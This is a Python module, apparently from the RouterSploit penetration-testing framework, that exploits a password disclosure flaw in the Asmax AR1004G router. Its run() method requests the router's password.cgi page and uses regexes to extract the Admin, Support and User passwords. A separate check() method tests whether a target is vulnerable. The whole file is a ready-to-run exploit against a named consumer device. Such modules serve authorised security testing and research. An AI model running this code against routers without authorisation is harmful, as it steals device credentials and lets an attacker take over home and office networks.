import re

from routersploit import (
    exploits,
    sanitize_url,
    print_status,
    print_error,
    print_success,
    print_table,
    http_request,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for Asmax AR1004G Password Disclosure vulnerability.
    If the target is vulnerable it allows to read credentials for admin, support and user."
    """
    __info__ = {
        'name': 'Asmax AR1004G Password Disclosure',
        'description': 'Exploits asmax password disclosure vulnerability that allows to '
                       'fetch credentials for: Admin, Support and User accounts.',
        'authors': [
            'Marcin Bury <marcin.bury@reverse-shell.com>',  # routersploit module
        ],
        'references': [
             'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
        ],
        'targets': [
             'Asmax AR 1004g',
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
        creds = []
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

        print_status("Requesting for {}".format(url))
        try:
            response = http_request(method="GET", url=url).text
        except AttributeError:
            return

        admin = re.findall("pwdAdmin = '(.+?)'", response)
        if admin:
            creds.append(('Admin', admin[0]))

        support = re.findall("pwdSupport = '(.+?)'", response)
        if support:
            creds.append(('Support', support[0]))

        user = re.findall("pwdUser = '(.+?)'", response)
        if user:
            creds.append(('User', user[0]))

        if creds:
            print_success("Credentials found!")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Credentials could not be found")

    def check(self):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

        try:
            response = http_request(method="GET", url=url).text
        except AttributeError:
            return None  # could not be verified

        if any(map(lambda x: x in response, ["pwdSupport", "pwdUser", "pwdAdmin"])):
            return True  # target vulnerable

        return False  # target not vulnerable
